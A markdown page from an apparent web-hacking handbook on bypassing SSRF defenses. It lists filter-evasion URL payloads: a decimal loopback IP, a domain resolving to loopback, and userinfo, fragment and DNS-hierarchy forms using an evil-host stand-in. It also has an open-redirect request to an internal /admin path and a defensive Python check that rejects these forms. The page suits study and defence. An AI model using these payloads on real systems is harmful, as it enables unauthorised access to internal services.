handbook/tools/3.Web-Hacking/4.Injection/SSRF/Notes/3.Bypassing-SSRF-Defenses.md

2024-08-30 23:07:22 +00:00
## Bypassing SSRF Defenses
It is common to see applications containing SSRF behavior together with defenses aimed at preventing malicious exploitation. Often, these defenses can be circumvented.
### Bypassing Blacklist-Based Input Filters
- Applications often block input containing particular hostnames (such as 127.0.0.1) or URL paths (such as /admin)
- Bypass in these ways:
  - Use an alternative IP representation of 127.0.0.1 (2130706433)
  - Register your own domain that resolves to 127.0.0.1 (spoofed.burpcollaborator.net)
  - Obfuscate blocked strings using URL encoding or case variation
### Bypassing Whitelist-Based Input Filters
- Embed credentials in a URL before the hostname:
```
https://expected-host@evil-host
```
- Use the # character to indicate a URL fragment:
```
https://evil-host#expected-host
```
- Leverage the DNS naming hierarchy to place the required input into a fully-qualified DNS name you control:
```
https://expected-host.evil-host
```
- URL-encode characters to confuse the URL-parsing code
- Combine these various techniques together
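The blacklist and whitelist bypasses above work because the filter inspects the raw string rather than the host the HTTP client will actually connect to. The following Python is added here as an illustration (it is not code from these notes): it runs the URL forms listed above through a substring-style check and a stricter parse-then-resolve check. The allow-list, the hostnames and the `fake_dns` resolver table are constructed so the code runs offline.

```python
import ipaddress
import socket
from urllib.parse import urlsplit

# Constructed resolver table so the checks run offline: 93.184.216.x stand in
# for public addresses; the decimal form maps to loopback as inet_aton parses it.
_TABLE = {"expected-host": "93.184.216.34", "evil-host": "93.184.216.35",
          "2130706433": "127.0.0.1"}

def fake_dns(host: str) -> str:
    return _TABLE.get(host, "")

def naive_allowlist(url: str, allowed: set) -> bool:
    """Weak check: passes if an allowed host appears anywhere in the string."""
    return any(h in url for h in allowed)

def naive_blocklist(url: str) -> bool:
    """Weak check: passes unless a literal loopback string appears."""
    return "127.0.0.1" not in url and "localhost" not in url

def strict_check(url: str, allowed=None, resolve=socket.gethostbyname) -> bool:
    """Parse first, then judge the host the client will actually connect to:
    reject userinfo, compare the parsed hostname (not the raw string) with
    the allow-list, resolve it and require a public address."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https"):
        return False
    if parts.username is not None or parts.password is not None:
        return False                       # expected-host@evil-host form
    host = parts.hostname                  # userinfo, port and fragment removed
    if not host or (allowed is not None and host not in allowed):
        return False                       # evil-host#expected-host, expected-host.evil-host
    try:
        addr = ipaddress.ip_address(resolve(host))
    except (OSError, ValueError):
        return False
    # Hand this vetted address to the HTTP client; re-resolving the name
    # at connect time would reopen the hole.
    return addr.is_global

def demo() -> dict:
    """Run the bypass URLs from the notes through all three checks."""
    allowed = {"expected-host"}
    urls = ["https://expected-host@evil-host/", "https://evil-host#expected-host",
            "https://expected-host.evil-host/", "http://2130706433/"]
    return {u: (naive_allowlist(u, allowed), naive_blocklist(u),
                strict_check(u, allowed, fake_dns)) for u in urls}
```

Each tuple in `demo()` reads (naive allow-list, naive block-list, strict): the first two accept every bypass form, the strict check rejects all of them.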
### Bypassing with Open Redirection
- Suppose the following is true:
  - The user-submitted URL is strictly validated
  - The application contains an open redirection vulnerability
- Construct a URL that meets the filter but redirects to a back-end target:
```
POST /product/stock HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 118

stockApi=http://weliketoshop.net/product/nextProduct?currentProductId=6&path=http://192.168.0.68/admin
```